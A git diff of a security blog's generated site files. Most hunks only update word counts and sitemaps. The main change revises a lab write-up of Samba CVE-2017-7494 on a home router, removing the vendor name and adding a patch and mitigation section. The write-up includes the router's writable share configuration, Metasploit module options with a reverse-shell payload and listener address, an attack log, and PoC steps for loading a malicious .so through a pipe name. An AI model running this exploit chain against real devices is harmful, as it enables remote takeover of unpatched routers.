-    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
-    <lastmod>2019-04-15</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
-    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
+    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
-    <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
+    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
-    <loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
+    <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>
 </urlset>
diff --git a/bookmarks/index.html b/bookmarks/index.html
index b2511abc..1ded350b 100644
--- a/bookmarks/index.html
+++ b/bookmarks/index.html
@@ -512,7 +512,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/IOT/index.html b/categories/IOT/index.html
index db7d2d8f..167fa6cb 100644
--- a/categories/IOT/index.html
+++ b/categories/IOT/index.html
@@ -388,7 +388,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -604,7 +604,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/Pwn二进制漏洞/index.html b/categories/Pwn二进制漏洞/index.html
index 06a364b0..70a8593f 100644
--- a/categories/Pwn二进制漏洞/index.html
+++ b/categories/Pwn二进制漏洞/index.html
@@ -500,7 +500,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/index.html b/categories/index.html
index c6169444..4aa8c025 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -465,7 +465,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/web/index.html b/categories/web/index.html
index 4b8cb083..e985b8dc 100644
--- a/categories/web/index.html
+++ b/categories/web/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/二进制/index.html b/categories/二进制/index.html
index f1b4e6dc..99372f79 100644
--- a/categories/二进制/index.html
+++ b/categories/二进制/index.html
@@ -578,7 +578,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/加密解密/index.html b/categories/加密解密/index.html
index b7adcbed..58349069 100644
--- a/categories/加密解密/index.html
+++ b/categories/加密解密/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/杂七杂八/index.html b/categories/杂七杂八/index.html
index afe89093..68f2d07d 100644
--- a/categories/杂七杂八/index.html
+++ b/categories/杂七杂八/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/理论学习/index.html b/categories/理论学习/index.html
index fc0d1c08..e5dfdeb2 100644
--- a/categories/理论学习/index.html
+++ b/categories/理论学习/index.html
@@ -474,7 +474,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/categories/顶会论文/index.html b/categories/顶会论文/index.html
index 1cb8b09e..cf8cff89 100644
--- a/categories/顶会论文/index.html
+++ b/categories/顶会论文/index.html
@@ -526,7 +526,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/index.html b/index.html
index b9c70633..b6b0b97d 100644
--- a/index.html
+++ b/index.html
@@ -2293,7 +2293,7 @@ MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/page/2/index.html b/page/2/index.html
index 37094765..240f4b3c 100644
--- a/page/2/index.html
+++ b/page/2/index.html
@@ -733,7 +733,7 @@ WinDbg
         
           <h1 class="post-title" itemprop="name headline">
                 
-                <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">小米路由器与Samba漏洞CVE-2017-7494</a></h1>
+                <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">某厂商路由器与Samba漏洞CVE-2017-7494</a></h1>
         
 
         <div class="post-meta">
@@ -785,7 +785,7 @@ WinDbg
 
           
           
-             <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="小米路由器与Samba漏洞CVE-2017-7494">
+             <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="某厂商路由器与Samba漏洞CVE-2017-7494">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-eye"></i>
@@ -808,7 +808,7 @@ WinDbg
                 </span>
                 
                 <span title="字数统计">
-                  1.6k 字
+                  1.7k 字
                 </span>
               
 
@@ -822,7 +822,7 @@ WinDbg
                 </span>
                 
                 <span title="阅读时长">
-                  6 分钟
+                  7 分钟
                 </span>
               
             </div>
@@ -845,11 +845,13 @@ WinDbg
       
         
           
-          小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：
+          漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下：
 
 服务器打开了文件/打印机共享端口445，让其能够在公网上访问
 
-共享文件拥有写
+共享文件拥有写入权限
+
+恶意攻击者需猜解Samba服务端共享目录的
           ...
           <!--noindex-->
           <div class="post-button text-center">
@@ -2347,7 +2349,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/page/3/index.html b/page/3/index.html
index 543afc2c..52710d79 100644
--- a/page/3/index.html
+++ b/page/3/index.html
@@ -795,7 +795,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/search.xml b/search.xml
index 81127153..e58fd9dd 100644
--- a/search.xml
+++ b/search.xml
@@ -143,9 +143,9 @@
       </tags>
   </entry>
   <entry>
-    <title><![CDATA[小米路由器与Samba漏洞CVE-2017-7494]]></title>
+    <title><![CDATA[某厂商路由器与Samba漏洞CVE-2017-7494]]></title>
     <url>%2F2019%2F03%2F25%2FSamba-CVE%2F</url>
-    <content type="text"><![CDATA[小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下： 服务器打开了文件/打印机共享端口445，让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB（Server Messages Block，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 SMB协议是客户机/服务器型协议，客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源，还能与全世界的电脑分享资源。 漏洞成因处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤，导致可以用绝对路径调用恶意的so文件，从而远程任意代码执行。首先看到is_known_pipename()函数 跟进到smb_probe_module() 再跟进到do_smb_load_module()，发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数 我们可以通过smb服务上传一个恶意的so文件，该文件包含一个输出函数init_samba_module，随后通过上述过程进行调用，执行任意代码。 漏洞复现小米路由器123456netstat -apnttcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbdnmap 192.168.31.1139/tcp open netbios-ssn445/tcp open microsoft-ds 端口已开启12345678910111213141516171819202122232425262728293031323334353637383940414243444546vim /etc/samba/smb.conf deadtime = 30 domain master = yes encrypt passwords = true enable core files = no guest account = nobody guest ok = yes invalid users = local master = yes load printers = no map to guest = Bad User min receivefile size = 16384 null passwords = yes obey pam restrictions = yes passdb backend = smbpasswd preferred master = yes printable = no smb encrypt = disabled smb passwd file = /etc/samba/smbpasswd socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576 smb2 max trans = 1048576 smb2 max write = 1048576 smb2 max read = 1048576 write cache size = 262144 syslog = 2 syslog only = yes use sendfile = yes writeable = yes log level = 1 unicode = True max log size = 500 log file = /tmp/log/samba.log server role = STANDALONE[homes] comment = Home Directories browsable = no read only = no create mode = 0750[data] ***SMB_SHARE_NAME*** path = /tmp ***SMB_FOLDER*** read only = no ***具备可写权限*** guest ok = yes ***允许匿名*** create mask = 0777 directory mask = 0777 具有可写权限、目录为/tmp 攻击：使用metasploit设置攻击参数靶机是小米路由器R3，它的系统为mips架构，但是这个库好像对它的支持不是很好12345678910111213141516171819202122232425show optionsModule options (exploit/linux/samba/is_known_pipename): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.31.1 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMB_FOLDER no The directory to use within the writeable SMB share SMB_SHARE_NAME no The name of the SMB share containing a writeable directoryPayload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.216.129 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 7 Linux MIPSLE 执行攻击123456789101112exploit[*] Started reverse TCP handler on 192.168.216.129:4444[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;[*] 192.168.31.1:445 - Share &apos;data&apos; has server-side path &apos;/tmp[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND[*] Exploit completed, but no session was created. 虽然报错，但是查看共享文件夹/tmp却发现了生成了.so文件知乎这篇专栏也有相同问题 分析POC，查找原因(来自Wz’blog) 建立SMB连接。若需要账号密码登录，则必须登录后才能继续从微软上扒的SMB协议建立时序图： 对应POC: 利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path) 其中find_writeable_path()函数需要跟进看一下： 再跟进看enumerate_directories()以及verify_writeable_directory函数 可以看到代码逻辑很清楚，首先遍历出当前路径所有的文件夹，然后尝试往里面写一个随机的txt文件用作可写测试，随后删除掉txt文件，记录下可写的文件路径。至此，我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp) 利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)至此获取到了共享名data的绝对路径。值得注意的是，这里跟早期的Payload不一样，早期的payload是靠暴力猜解目录，所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径，极大地提高了攻击的成功率。 上传恶意so文件其中写入的so文件是Metasploit生成的反弹shell，很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数，这个原因上述的漏洞分析也有提及。 调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so，然后通过SMB_COM_NT_CREATE_ANDX进行调用。在复现时，调用恶意so文件总会失败，产生Error Code为：STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况，也许要详细看看smb协议才能知道了。POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志，随后就是用NBSS协议进行了一次远程代码执行的测试，执行代码为echo随机字符串。 删除恶意so文件，断开smb连接 由msf给出的poc过程可见，对小米路由器的攻击在第五步出现问题，因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND]]></content>
+    <content type="text"><![CDATA[漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。具体执行条件如下： 服务器打开了文件/打印机共享端口445，让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB（Server Messages Block，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 SMB协议是客户机/服务器型协议，客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源，还能与全世界的电脑分享资源。 某厂商路由器的smbd版本为4.0.21，该漏洞影响Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 漏洞成因处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤，导致可以用绝对路径调用恶意的so文件，从而远程任意代码执行。首先看到is_known_pipename()`函数 跟进到smb_probe_module() 再跟进到do_smb_load_module()，发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数 我们可以通过smb服务上传一个恶意的so文件，随后通过上述过程进行调用，执行任意代码。 漏洞复现某路由器满足条件123456netstat -apnttcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbdnmap 192.168.31.1139/tcp open netbios-ssn445/tcp open microsoft-ds 端口已开启12345678910111213141516171819202122232425262728293031323334353637383940414243444546vim /etc/samba/smb.conf deadtime = 30 domain master = yes encrypt passwords = true enable core files = no guest account = nobody guest ok = yes invalid users = local master = yes load printers = no map to guest = Bad User min receivefile size = 16384 null passwords = yes obey pam restrictions = yes passdb backend = smbpasswd preferred master = yes printable = no smb encrypt = disabled smb passwd file = /etc/samba/smbpasswd socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576 smb2 max trans = 1048576 smb2 max write = 1048576 smb2 max read = 1048576 write cache size = 262144 syslog = 2 syslog only = yes use sendfile = yes writeable = yes log level = 1 unicode = True max log size = 500 log file = /tmp/log/samba.log server role = STANDALONE[homes] comment = Home Directories browsable = no read only = no create mode = 0750[data] ***SMB_SHARE_NAME*** path = /tmp ***SMB_FOLDER*** read only = no ***具备可写权限*** guest ok = yes ***允许匿名*** create mask = 0777 directory mask = 0777 具有可写权限、目录为/tmp 攻击：使用metasploit设置攻击参数靶机是某厂商路由器，它的系统为mips架构，但是这个库好像对它的支持不是很好12345678910111213141516171819202122232425show optionsModule options (exploit/linux/samba/is_known_pipename): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.31.1 yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMB_FOLDER no The directory to use within the writeable SMB share SMB_SHARE_NAME no The name of the SMB share containing a writeable directoryPayload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.216.129 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 7 Linux MIPSLE 执行攻击123456789101112exploit[*] Started reverse TCP handler on 192.168.216.129:4444[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;[*] 192.168.31.1:445 - Share &apos;data&apos; has server-side path &apos;/tmp[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND[*] Exploit completed, but no session was created. 虽然报错，但是查看共享文件夹/tmp却发现了生成了.so文件知乎这篇专栏也有相同问题 修补方案最安全的方法还是打补丁或者升级到Samba 4.6.4/4.5.10/4.4.14任意版本，可以参考 https://www.samba.org/samba/history/security.html 如果暂时不能升级版本或安装补丁，可以使用临时解决方案：在smb.conf的[global]板块中添加参数：nt pipe support = no然后重启smbd服务。 分析POC，查找原因(来自Wz’blog) 建立SMB连接。若需要账号密码登录，则必须登录后才能继续从微软上扒的SMB协议建立时序图： 对应POC: 利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path) 其中find_writeable_path()函数需要跟进看一下： 再跟进看enumerate_directories()以及verify_writeable_directory函数 可以看到代码逻辑很清楚，首先遍历出当前路径所有的文件夹，然后尝试往里面写一个随机的txt文件用作可写测试，随后删除掉txt文件，记录下可写的文件路径。至此，我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp) 利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)至此获取到了共享名data的绝对路径。值得注意的是，这里跟早期的Payload不一样，早期的payload是靠暴力猜解目录，所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径，极大地提高了攻击的成功率。 上传恶意so文件其中写入的so文件是Metasploit生成的反弹shell，很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数，这个原因上述的漏洞分析也有提及。 调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so，然后通过SMB_COM_NT_CREATE_ANDX进行调用。在复现时，调用恶意so文件总会失败，产生Error Code为：STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况，也许要详细看看smb协议才能知道了。POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志，随后就是用NBSS协议进行了一次远程代码执行的测试，执行代码为echo随机字符串。 删除恶意so文件，断开smb连接 由msf给出的poc过程可见，对路由器的攻击在第五步出现问题，因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND]]></content>
       <categories>
         <category>IOT</category>
       </categories>
diff --git a/sitemap.xml b/sitemap.xml
index a6c8738e..1193764a 100644
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -1,6 +1,13 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   
+  <url>
+    <loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
+    
+    <lastmod>2019-07-27T06:39:41.484Z</lastmod>
+    
+  </url>
+  
   <url>
     <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
     
@@ -155,13 +162,6 @@
     
   </url>
   
-  <url>
-    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
-    
-    <lastmod>2019-04-15T07:35:38.082Z</lastmod>
-    
-  </url>
-  
   <url>
     <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
     
@@ -170,14 +170,21 @@
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
+    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
+    
+    <lastmod>2019-04-15T07:35:38.082Z</lastmod>
+    
+  </url>
+  
+  <url>
+    <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
     
     <lastmod>2019-04-15T07:35:38.081Z</lastmod>
     
   </url>
   
   <url>
-    <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
+    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
     
     <lastmod>2019-04-15T07:35:38.081Z</lastmod>
     
@@ -190,11 +197,4 @@
     
   </url>
   
-  <url>
-    <loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
-    
-    <lastmod>2019-04-15T07:35:38.080Z</lastmod>
-    
-  </url>
-  
 </urlset>
diff --git a/tags/AFL/index.html b/tags/AFL/index.html
index 7ae57518..7369d6e5 100644
--- a/tags/AFL/index.html
+++ b/tags/AFL/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/CVE/index.html b/tags/CVE/index.html
index 3fe2ad9d..632f94d8 100644
--- a/tags/CVE/index.html
+++ b/tags/CVE/index.html
@@ -310,7 +310,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/IoT/index.html b/tags/IoT/index.html
index dd0c4185..ad4ca9ed 100644
--- a/tags/IoT/index.html
+++ b/tags/IoT/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/MiniUPnP/index.html b/tags/MiniUPnP/index.html
index 9e7c71c5..1b7ff407 100644
--- a/tags/MiniUPnP/index.html
+++ b/tags/MiniUPnP/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/PE/index.html b/tags/PE/index.html
index 2afbf36b..cd8e27e2 100644
--- a/tags/PE/index.html
+++ b/tags/PE/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/QQ/index.html b/tags/QQ/index.html
index bf5f6097..136ee9bf 100644
--- a/tags/QQ/index.html
+++ b/tags/QQ/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/SSH/index.html b/tags/SSH/index.html
index b9e2c4fd..55301a91 100644
--- a/tags/SSH/index.html
+++ b/tags/SSH/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/Samba/index.html b/tags/Samba/index.html
index 871db4c9..3d7bfaa3 100644
--- a/tags/Samba/index.html
+++ b/tags/Samba/index.html
@@ -310,7 +310,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/TCPDUMP/index.html b/tags/TCPDUMP/index.html
index 299f5251..3efd87d6 100644
--- a/tags/TCPDUMP/index.html
+++ b/tags/TCPDUMP/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/USENIX/index.html b/tags/USENIX/index.html
index 61f3d21b..69ce6e3b 100644
--- a/tags/USENIX/index.html
+++ b/tags/USENIX/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/Windows/index.html b/tags/Windows/index.html
index b1f0b859..655c3d78 100644
--- a/tags/Windows/index.html
+++ b/tags/Windows/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/ctf/index.html b/tags/ctf/index.html
index d1f57b55..9a05dae8 100644
--- a/tags/ctf/index.html
+++ b/tags/ctf/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/index.html b/tags/index.html
index c486acd6..2584f5c5 100644
--- a/tags/index.html
+++ b/tags/index.html
@@ -465,7 +465,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/itchat/index.html b/tags/itchat/index.html
index 86d4a324..6241adad 100644
--- a/tags/itchat/index.html
+++ b/tags/itchat/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/linux/index.html b/tags/linux/index.html
index b5e93d5a..9cd89de5 100644
--- a/tags/linux/index.html
+++ b/tags/linux/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/miio/index.html b/tags/miio/index.html
index 1688612c..912b60b6 100644
--- a/tags/miio/index.html
+++ b/tags/miio/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/pwn/index.html b/tags/pwn/index.html
index 5552b81b..5baf4d4e 100644
--- a/tags/pwn/index.html
+++ b/tags/pwn/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/python/index.html b/tags/python/index.html
index 5865e566..cfc70760 100644
--- a/tags/python/index.html
+++ b/tags/python/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/tags/web/index.html b/tags/web/index.html
index 58557b22..31df8f60 100644
--- a/tags/web/index.html
+++ b/tags/web/index.html
